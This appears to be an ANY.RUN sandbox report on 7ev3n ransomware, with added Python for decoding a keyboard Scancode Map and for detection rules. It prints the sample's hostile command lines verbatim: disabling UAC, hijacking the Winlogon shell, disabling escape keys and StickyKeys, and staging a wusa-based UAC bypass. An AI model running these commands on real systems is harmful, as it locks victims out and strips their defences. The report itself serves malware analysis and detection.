File name: Ransomware.7ev3n.zip
Full analysis: https://app.any.run/tasks/cf679f26-2f69-4630-8cae-87c494dd418b
Verdict: Malicious activity
Analysis date: June 04, 2024, 17:28:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
MD5: 71F4666373DB57958635DE89EDB58A65
SHA1: 71B4504062E2C0C08B03E39387633FB068705DA7
SHA256: 72810CDF913169DF2B42ABAF2D34840CA04B91D640B778CA2580F744BE1DAA1D
SSDEEP: 6144:4CXgeVc8YG8ekHKb4s1pNLAsqbzZFRWqe:4CXgeVc8DjkHDKpusqRFRWqe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is, for the reader's awareness. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 3964)
      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • uac.exe (PID: 1876)
    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 2284)
    • Changes the login/logoff helper path in the registry

      • reg.exe (PID: 2448)
    • Creates a writable file in the system directory

      • wusa.exe (PID: 1604)
    • Changes the autorun value in the registry

      • reg.exe (PID: 2340)
    • UAC/LUA settings modification

      • reg.exe (PID: 1044)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3964)
      • Ransomware.7ev3n.exe (PID: 4004)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1852)
    • The process creates files with name similar to system file names

      • Ransomware.7ev3n.exe (PID: 4004)
    • Executable content was dropped or overwritten

      • Ransomware.7ev3n.exe (PID: 4004)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1020)
      • wusa.exe (PID: 1604)
    • Reads the Internet Settings

      • Ransomware.7ev3n.exe (PID: 4004)
      • uac.exe (PID: 1876)
      • cmd.exe (PID: 336)
      • system.exe (PID: 1852)
    • Starts itself from another location

      • Ransomware.7ev3n.exe (PID: 4004)
    • The executable file from the user directory is run by the CMD process

      • uac.exe (PID: 1876)
    • Process drops legitimate windows executable

      • uac.exe (PID: 1876)
      • wusa.exe (PID: 1604)
    • Starts CMD.EXE for commands execution

      • uac.exe (PID: 1876)
      • system.exe (PID: 1020)
      • system.exe (PID: 1852)
    • Executing commands from a ".bat" file

      • system.exe (PID: 1020)
      • system.exe (PID: 1852)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 1936)
      • cmd.exe (PID: 2080)
      • cmd.exe (PID: 2172)
      • cmd.exe (PID: 1804)
      • cmd.exe (PID: 1676)
      • cmd.exe (PID: 2524)
      • cmd.exe (PID: 2692)
  • INFO

    • Checks supported languages

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1852)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 3964)
    • Creates files or folders in the user directory

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • system.exe (PID: 1852)
    • Reads the machine GUID from the registry

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • system.exe (PID: 1852)
    • Reads the computer name

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1020)
      • uac.exe (PID: 1876)
      • system.exe (PID: 1852)
    • Checks proxy server information

      • Ransomware.7ev3n.exe (PID: 4004)
      • system.exe (PID: 1852)
    • Create files in a temporary directory

      • uac.exe (PID: 1876)
    • Drops the executable file immediately after the start

      • wusa.exe (PID: 1604)
Find more information about signature artifacts and their mapping to the MITRE ATT&CK™ matrix in the full report.
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF (ZIP)

ZipRequiredVersion: 20
ZipBitFlag: 0x0009 (bit 0: entry is encrypted; bit 3: CRC and sizes live in a trailing data descriptor)
ZipCompression: Unknown (99) (method 99 is the WinZip AES-encryption marker; the underlying compression method is recorded in the AE-x extra field)
ZipModifyDate: 2019:10:10 18:33:38
ZipCRC: 0xfaa96043
ZipCompressedSize: 146680
ZipUncompressedSize: 322560
ZipFileName: Ransomware.7ev3n.exe
All screenshots are available in the full report
Total processes: 80
Monitored processes: 30
Malicious processes: 5
Suspicious processes: 5

Behavior graph

Process nodes in the order the graph shows them ("no specs" marks processes for which the report records no further details): winrar.exe, ransomware.7ev3n.exe, system.exe, cmd.exe (no specs), cmd.exe (no specs), uac.exe, cmd.exe (no specs), wusa.exe (no specs), wusa.exe (no specs), wusa.exe, winsat.exe (no specs), winsat.exe, system.exe, cmd.exe (no specs), cmd.exe, schtasks.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), reg.exe, reg.exe (no specs), reg.exe, reg.exe (no specs), reg.exe (no specs), reg.exe (no specs), cmd.exe (no specs), reg.exe (no specs)

Process information

Fields per process: PID, CMD, Path, Parent process, then the recorded attributes and loaded modules.
PID: 336
CMD: "C:\Windows\System32\cmd.exe" /c wusa C:\Users\admin\AppData\Local\Temp\ellocnak.msu /extract:%windir%\system32\sysprep
Path: C:\Windows\System32\cmd.exe
Parent process: uac.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 664
CMD: REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
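The REG_BINARY that PID 664 writes to Scancode Map is the keyboard-remapping table the keyboard class driver loads at the next boot; decoding it shows which keys the locker takes away from the victim (Alt, Win, Ctrl, Tab, Esc, Enter and several function keys, so no Alt+Tab, Ctrl+Esc, Win or Alt+F4 to get out of the lock screen). The decoder below is an added example, not part of the ANY.RUN report or the sample; its scancode table is a small subset of the Set 1 codes, enough for this value, and the encoder exists only to show what a well-formed count field for the same entry list looks like. One detail worth checking in any such value: the count DWORD here is 0x17 (23), but the value holds 17 entries including the null terminator, which looks like the author wrote 17 as if the field were decimal.

```python
"""Decode a Windows 'Scancode Map' REG_BINARY value.

Added example, not from the ANY.RUN report or the sample. OBSERVED_MAP is the
hex data from the REG ADD command line of PID 664; everything else is
constructed for illustration.
"""
import struct

# Subset of PS/2 Set 1 make codes sufficient for the observed value.
# Extended (0xE0-prefixed) keys are stored as 0xE0xx.
SCANCODE_NAMES = {
    0x0001: "Esc", 0x000F: "Tab", 0x001C: "Enter", 0x001D: "Left Ctrl",
    0x0036: "Right Shift", 0x0038: "Left Alt", 0x003B: "F1", 0x003D: "F3",
    0x003E: "F4", 0x0044: "F10", 0x0045: "Num Lock",
    0xE01D: "Right Ctrl", 0xE038: "Right Alt", 0xE05B: "Left Win",
    0xE05C: "Right Win", 0xE05D: "Application (menu)",
}

# Data written by PID 664 (HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout).
OBSERVED_MAP = bytes.fromhex(
    "00000000000000001700000000003800000038e000005be000005ce00000360000001d00"
    "00001de000000f000000010000001c0000003e0000003b00000044000000450000003d00"
    "00005de000000000"
)


def decode_scancode_map(blob: bytes) -> dict:
    """Parse the Scancode Map layout: three little-endian DWORDs (header version,
    header flags, entry count including the terminating null entry) followed by
    4-byte entries of (new scancode WORD, original scancode WORD). A new scancode
    of 0x0000 disables the original key."""
    if len(blob) < 12 or len(blob) % 4:
        raise ValueError("Scancode Map must be at least 12 bytes and DWORD-aligned")
    version, flags, declared = struct.unpack_from("<III", blob, 0)
    body = blob[12:]
    actual = len(body) // 4
    mappings, disabled, terminated = [], [], False
    for i in range(actual):
        new_code, orig_code = struct.unpack_from("<HH", body, i * 4)
        if new_code == 0 and orig_code == 0:
            terminated = True
            break
        name = SCANCODE_NAMES.get(orig_code, f"0x{orig_code:04X}")
        mappings.append((orig_code, new_code, name))
        if new_code == 0:
            disabled.append(name)
    return {
        "version": version,
        "flags": flags,
        "declared_entries": declared,
        "actual_entries": actual,
        # A well-formed value declares exactly the number of entries present,
        # terminator included, and ends with that terminator.
        "count_consistent": terminated and declared == actual,
        "mappings": mappings,
        "disabled_keys": disabled,
    }


def encode_scancode_map(disabled_codes) -> bytes:
    """Build a well-formed map that disables the given original scancodes."""
    entries = [struct.pack("<HH", 0, code) for code in disabled_codes]
    entries.append(b"\x00" * 4)  # null terminator counts as an entry
    return struct.pack("<III", 0, 0, len(entries)) + b"".join(entries)


def describe(blob: bytes) -> str:
    """Human-readable summary of a decoded map."""
    r = decode_scancode_map(blob)
    lines = [f"declared entries: {r['declared_entries']} (0x{r['declared_entries']:X}), "
             f"present: {r['actual_entries']}, consistent: {r['count_consistent']}"]
    for orig, new, name in r["mappings"]:
        action = "DISABLED" if new == 0 else f"remapped to 0x{new:04X}"
        lines.append(f"  0x{orig:04X} {name:<20} {action}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(describe(OBSERVED_MAP))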
PID: 752
CMD: cmd.exe /c C:\Users\admin\AppData\Local\uac.exe 32 C:\Users\admin\AppData\Local\system.exe
Path: C:\Windows\System32\cmd.exe
Parent process: system.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1020
CMD: "C:\Users\admin\AppData\Local\system.exe"
Path: C:\Users\admin\AppData\Local\system.exe
Parent process: Ransomware.7ev3n.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\appdata\local\system.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
PID: 1036
CMD: C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\del.bat
Path: C:\Windows\System32\cmd.exe
Parent process: system.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1044
CMD: REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
Path: C:\Windows\System32\reg.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 1424
CMD: "C:\Windows\system32\sysprep\winsat.exe"
Path: C:\Windows\System32\sysprep\winsat.exe
Parent process: uac.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows System Assessment Tool
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED)
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\sysprep\winsat.exe
c:\windows\system32\ntdll.dll
PID: 1604
CMD: "C:\Windows\system32\wusa.exe" C:\Users\admin\AppData\Local\Temp\ellocnak.msu /extract:C:\Windows\system32\sysprep
Path: C:\Windows\System32\wusa.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Update Standalone Installer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wusa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
PID: 1676
CMD: C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
Path: C:\Windows\System32\cmd.exe
Parent process: system.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1804
CMD: C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\admin\AppData\Local\system.exe" /f /reg:64
Path: C:\Windows\System32\cmd.exe
Parent process: system.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
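Read together, the process records describe a UAC bypass followed by persistence and user lockout. cmd.exe (PID 336, medium integrity) asks wusa.exe to expand an MSU into %windir%\system32\sysprep; wusa.exe (PID 1604) does so at high integrity and, per the Dropped files section, writes winsat.exe and a powrprof.dll into that directory, after which the relocated winsat.exe (PID 1424) is launched from there. The debug strings at the end of the report ("[UCM]", "Akagi", "Fubuki") are the ones used by the open-source UACMe project, which is what this staging pattern matches. Only after that step do the reg.exe and cmd.exe children run at high integrity to set EnableLUA to 0, point Winlogon\Shell at the copy of system.exe in AppData\Local, write a Scancode Map and clear the StickyKeys hotkey bit (Flags 506 is the Windows 7 default of 510 with bit 0x4, SKF_HOTKEYACTIVE, removed). One caveat for anyone writing detections from this: wusa.exe accepted /extract on Windows 7 and 8.1 but the switch was removed in Windows 10, so this exact staging step does not occur on current builds even though the registry tampering still does. The following Python is an added example, not the report's own logic or the sample's code: it encodes those observations as rules and runs them over the process records transcribed from the section above. The record with PID 9999 (Contoso key) is constructed as a benign control and is not from the report.

```python
"""Triage rules over the process records of this report.

Added example, not the report's or the sample's own code. SAMPLE_PROCESSES is
transcribed from the 'Process information' section; the PID 9999 record is a
constructed benign control.
"""
import re
from collections import namedtuple

Process = namedtuple("Process", "pid image path cmdline parent")

SAMPLE_PROCESSES = [
    Process(336, "cmd.exe", r"C:\Windows\System32\cmd.exe",
            r'"C:\Windows\System32\cmd.exe" /c wusa C:\Users\admin\AppData\Local\Temp\ellocnak.msu /extract:%windir%\system32\sysprep',
            "uac.exe"),
    Process(664, "reg.exe", r"C:\Windows\System32\reg.exe",
            r'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "'
            r'00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f00'
            r'0000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64',
            "cmd.exe"),
    Process(752, "cmd.exe", r"C:\Windows\System32\cmd.exe",
            r'cmd.exe /c C:\Users\admin\AppData\Local\uac.exe 32 C:\Users\admin\AppData\Local\system.exe',
            "system.exe"),
    Process(1020, "system.exe", r"C:\Users\admin\AppData\Local\system.exe",
            r'"C:\Users\admin\AppData\Local\system.exe"', "Ransomware.7ev3n.exe"),
    Process(1036, "cmd.exe", r"C:\Windows\System32\cmd.exe",
            r'C:\Windows\system32\cmd.exe /c C:\Users\admin\AppData\Local\del.bat', "system.exe"),
    Process(1044, "reg.exe", r"C:\Windows\System32\reg.exe",
            r'REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64',
            "cmd.exe"),
    Process(1424, "winsat.exe", r"C:\Windows\System32\sysprep\winsat.exe",
            r'"C:\Windows\system32\sysprep\winsat.exe" ', "uac.exe"),
    Process(1604, "wusa.exe", r"C:\Windows\System32\wusa.exe",
            r'"C:\Windows\system32\wusa.exe" C:\Users\admin\AppData\Local\Temp\ellocnak.msu /extract:C:\Windows\system32\sysprep',
            "cmd.exe"),
    Process(1676, "cmd.exe", r"C:\Windows\System32\cmd.exe",
            r'C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64',
            "system.exe"),
    Process(1804, "cmd.exe", r"C:\Windows\System32\cmd.exe",
            r'C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\admin\AppData\Local\system.exe" /f /reg:64',
            "system.exe"),
    # Constructed benign control (not in the report): same value name, unrelated key.
    Process(9999, "cmd.exe", r"C:\Windows\System32\cmd.exe",
            r'C:\Windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Software\Contoso" /v "Flags" /t REG_SZ /d 510 /f',
            "explorer.exe"),
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')                       # quoted or bare argument
WUSA_EXTRACT_RE = re.compile(r"\bwusa(?:\.exe)?\b.*?/extract:(\S+)", re.I)
SYSTEM_DIR_RE = re.compile(r"(?:%windir%|[a-z]:\\windows)\\system32\b", re.I)
APPDATA_ROOT_RE = re.compile(r"\\appdata\\local\\[^\\]+\.exe$", re.I)  # AppData\Local root only
# Auto-elevating binaries and their location on the 32-bit Windows 7 guest of this
# report; adjust for other builds.
EXPECTED_LOCATION = {"winsat.exe": r"c:\windows\system32\winsat.exe"}
SKF_HOTKEYACTIVE = 0x4  # StickyKeys Flags bit for the Shift x5 hotkey


def parse_reg_add(cmdline):
    """Return (key, value_name, data) from a REG ADD command line, or None."""
    toks = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    for i in range(len(toks) - 2):
        if toks[i].upper().split("\\")[-1] in ("REG", "REG.EXE") and toks[i + 1].upper() == "ADD":
            key, name, data = toks[i + 2], None, None
            j = i + 3
            while j < len(toks):
                flag = toks[j].upper()
                if flag in ("/V", "/D") and j + 1 < len(toks):
                    if flag == "/V":
                        name = toks[j + 1]
                    else:
                        data = toks[j + 1]
                    j += 2
                else:
                    j += 1
            return key, name, data
    return None


def evaluate(p):
    """Yield (rule_id, detail) pairs for one process record."""
    m = WUSA_EXTRACT_RE.search(p.cmdline)
    if m and SYSTEM_DIR_RE.search(m.group(1)):
        yield "wusa_extract_system_dir", f"wusa.exe extracts an MSU into {m.group(1)}"
    expected = EXPECTED_LOCATION.get(p.image.lower())
    if expected and p.path.lower() != expected:
        yield "system_binary_relocated", f"{p.image} ran from {p.path}, expected {expected}"
    if APPDATA_ROOT_RE.search(p.path):
        yield "exe_in_appdata_local_root", f"executable launched from {p.path}"
    reg = parse_reg_add(p.cmdline)
    if reg:
        key, name, data = reg
        k, n, d = key.lower(), (name or "").lower(), data or ""
        if k.endswith(r"\winlogon") and n == "shell" and d.lower() != "explorer.exe":
            yield "winlogon_shell_hijack", f"Winlogon Shell set to {d}"
        elif k.endswith(r"\policies\system") and n == "enablelua" and d == "0":
            yield "uac_disabled", "EnableLUA set to 0 (UAC off after the next reboot)"
        elif k.endswith(r"\keyboard layout") and n == "scancode map":
            yield "keyboard_scancode_map", "keyboard keys remapped or disabled via Scancode Map"
        elif (k.endswith(r"\accessibility\stickykeys") and n == "flags"
              and d.isdigit() and not int(d) & SKF_HOTKEYACTIVE):
            yield "sticky_keys_hotkey_off", f"StickyKeys Flags={d}: Shift x5 hotkey disabled"


def scan(processes):
    return [(p.pid, rule, detail) for p in processes for rule, detail in evaluate(p)]


def findings_by_pid(findings):
    out = {}
    for pid, rule, _ in findings:
        out.setdefault(pid, set()).add(rule)
    return out


if __name__ == "__main__":
    for pid, rule, detail in scan(SAMPLE_PROCESSES):
        print(f"PID {pid:<5} {rule:<28} {detail}")
```

The rules key on what the records show rather than on the sample's file names, so they also catch the same tradecraft under other names; the one name-bound rule (EXPECTED_LOCATION) is deliberately a path check, since an auto-elevating Windows binary executing from anywhere but its install location is the observable for this class of DLL-hijack bypass.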
Total events: 6 619
Read events: 6 494
Write events: 110
Delete events: 15

Modification events

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write   Name: ShellExtBMP
Value:

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write   Name: ShellExtIcon
Value:

Process: (3964) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation: write   Name: LanguageList
Value: en-US

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write   Name: 3
Value: C:\Users\admin\Desktop\phacker.zip

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write   Name: 2
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write   Name: 1
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write   Name: 0
Value: C:\Users\admin\AppData\Local\Temp\Ransomware.7ev3n.zip

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write   Name: name
Value: 120

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write   Name: size
Value: 80

Process: (3964) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write   Name: type
Value: 120
Executable files: 9
Suspicious files: 42
Text files: 3
Unknown types: 0

Dropped files

PID 4004  Ransomware.7ev3n.exe  executable
  C:\Users\admin\AppData\Local\system.exe
  MD5: 9F8BC96C96D43ECB69F883388D228754
  SHA256: 7D373CCB96D1DBB1856EF31AFA87C2112A0C1795A796AB01CB154700288AFEC5

PID 1876  uac.exe  binary
  C:\Users\admin\AppData\Local\Temp\emc7E5A.tmp
  MD5: C049AC4B753B53C51EAFDBF5A77AD54E
  SHA256: 8457508294FACA764A33CE788C3F6B1A35C02A3A602A3A904E45156998A6A44B

PID 1604  wusa.exe  executable
  C:\Windows\System32\sysprep\powrprof.dll
  MD5: F035352F9FDA534E2BF8417EFDED77DC
  SHA256: 150E78743248CAF78E1972A293B7AA18CF219F146CEF7B5771A76B51A9829D3A

PID 1604  wusa.exe  executable
  C:\Windows\System32\sysprep\winsat.exe
  MD5: 886B0EAA3B0FE76B3204E687C8DA6F66
  SHA256: B007057E6728C7E954CAEB45EAE0ADCD1C027DCB160746CCD2E78F91D18CCF80

PID 1876  uac.exe  executable
  C:\Users\admin\AppData\Local\Temp\winsat.exe
  MD5: 886B0EAA3B0FE76B3204E687C8DA6F66
  SHA256: B007057E6728C7E954CAEB45EAE0ADCD1C027DCB160746CCD2E78F91D18CCF80

PID 1876  uac.exe  binary
  C:\Users\admin\AppData\Local\Temp\emc7E5C.tmp
  MD5: C049AC4B753B53C51EAFDBF5A77AD54E
  SHA256: 8457508294FACA764A33CE788C3F6B1A35C02A3A602A3A904E45156998A6A44B

PID 1604  wusa.exe  text
  C:\Windows\Logs\DPX\setupact.log
  MD5: 3F0BF0FDADF0B6B9C0E8F54B46E27A14
  SHA256: 2760AD99788126637D1C033211E9E22A86101B1755CE60B7D84AF2F65BAA6C58

PID 1876  uac.exe  binary
  C:\Users\admin\AppData\Local\Temp\emc7E5D.tmp
  MD5: A7F30B548064E90EB78A31EA25365C62
  SHA256: 886F45A01E33622362828D49D0EDAADD59D8760A0581095B42916055059B50A4

PID 1876  uac.exe  binary
  C:\Users\admin\AppData\Local\Temp\emc7E59.tmp
  MD5: 4FC49E1A0F83A21BDC5E34B62EEB0D62
  SHA256: DAFC9806A73EC7652F24F11477A71681AA82A20C56CB752943A39E360CD794A6

PID 1852  system.exe  binary
  C:\Users\admin\Desktop\introductionmaps.jpg
  MD5: 0BA417E4AD4639ADA3D764DEFDC39960
  SHA256: AD04677A6BBAC68B9A5692FC21D34A7346C78BC5AF953018232693CCB65D5F7A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 8
DNS requests: 4
Threats: 0

HTTP requests

No HTTP requests

Connections

PID   Process               IP                    Domain           ASN                  CN  Reputation
4     System                192.168.100.255:137                                             whitelisted
4     System                192.168.100.255:138                                             unknown
                            224.0.0.252:5355                                                unknown
4004  Ransomware.7ev3n.exe  104.16.236.243:443    blockchain.info  CLOUDFLARENET            unknown
1852  system.exe            49.13.77.253:80       jaster.in        Hetzner Online GmbH  DE  unknown

DNS requests

Domain            IP                               Reputation
blockchain.info   104.16.236.243, 104.16.237.243   unknown
jaster.in         49.13.77.253                     unknown
dns.msftncsi.com  131.107.255.255                  shared

Threats

No threats detected
Process     Message
uac.exe     [UCM] Dll dropped successfully
winsat.exe  Akagi letter found
winsat.exe  C:\Users\admin\AppData\Local\system.exe
winsat.exe  Fubuki at your service.